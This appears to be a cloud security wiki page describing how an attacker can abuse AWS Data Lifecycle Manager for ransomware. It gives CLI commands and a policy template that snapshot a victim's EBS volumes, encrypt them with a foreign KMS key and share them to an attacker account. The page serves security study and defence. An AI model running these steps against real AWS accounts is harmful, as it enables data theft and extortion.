AWS - DLM Post Exploitation


Data Lifecycle Manager (DLM)

EC2:DescribeVolumes, DLM:CreateLifeCyclePolicy

A ransomware attack can be executed by encrypting as many EBS volumes as possible and then erasing the current EC2 instances, EBS volumes, and snapshots. To automate this malicious activity, one can employ Amazon DLM, encrypting the snapshots with a KMS key from another AWS account and transferring the encrypted snapshots to a different account. Alternatively, they might transfer snapshots without encryption to an account they manage and then encrypt them there. Although it is not straightforward to encrypt existing EBS volumes or snapshots directly, it is possible to do so by creating a new volume or snapshot.

Firstly, one will use a command to gather information on volumes, such as instance ID, volume ID, encryption status, attachment status, and volume type. `aws ec2 describe-volumes`

Secondly, one will create the lifecycle policy. This command employs the DLM API to set up a lifecycle policy that automatically takes daily snapshots of specified volumes at a designated time. It also applies specific tags to the snapshots and copies tags from the volumes to the snapshots. The policyDetails.json file includes the lifecycle policy's specifics, such as target tags, schedule, the ARN of the optional KMS key for encryption, and the target account for snapshot sharing, which will be recorded in the victim's CloudTrail logs.

```bash
aws dlm create-lifecycle-policy --description "My first policy" --state ENABLED --execution-role-arn arn:aws:iam::12345678910:role/AWSDataLifecycleManagerDefaultRole --policy-details file://policyDetails.json
```

A template for the policy document can be seen here:

```json
{
    "PolicyType": "EBS_SNAPSHOT_MANAGEMENT",
    "ResourceTypes": [
        "VOLUME"
    ],
    "TargetTags": [
        {
            "Key": "ExampleKey",
            "Value": "ExampleValue"
        }
    ],
    "Schedules": [
        {
            "Name": "DailySnapshots",
            "CopyTags": true,
            "TagsToAdd": [
                {
                    "Key": "SnapshotCreator",
                    "Value": "DLM"
                }
            ],
            "VariableTags": [
                {
                    "Key": "CostCenter",
                    "Value": "Finance"
                }
            ],
            "CreateRule": {
                "Interval": 24,
                "IntervalUnit": "HOURS",
                "Times": [
                    "03:00"
                ]
            },
            "RetainRule": {
                "Count": 14
            },
            "FastRestoreRule": {
                "Count": 2,
                "Interval": 12,
                "IntervalUnit": "HOURS"
            },
            "CrossRegionCopyRules": [
                {
                    "TargetRegion": "us-west-2",
                    "Encrypted": true,
                    "CmkArn": "arn:aws:kms:us-west-2:123456789012:key/your-kms-key-id",
                    "CopyTags": true,
                    "RetainRule": {
                        "Interval": 1,
                        "IntervalUnit": "DAYS"
                    }
                }
            ],
            "ShareRules": [
                {
                    "TargetAccounts": [
                        "123456789012"
                    ],
                    "UnshareInterval": 30,
                    "UnshareIntervalUnit": "DAYS"
                }
            ]
        }
    ],
    "Parameters": {
        "ExcludeBootVolume": false
    }
}
```
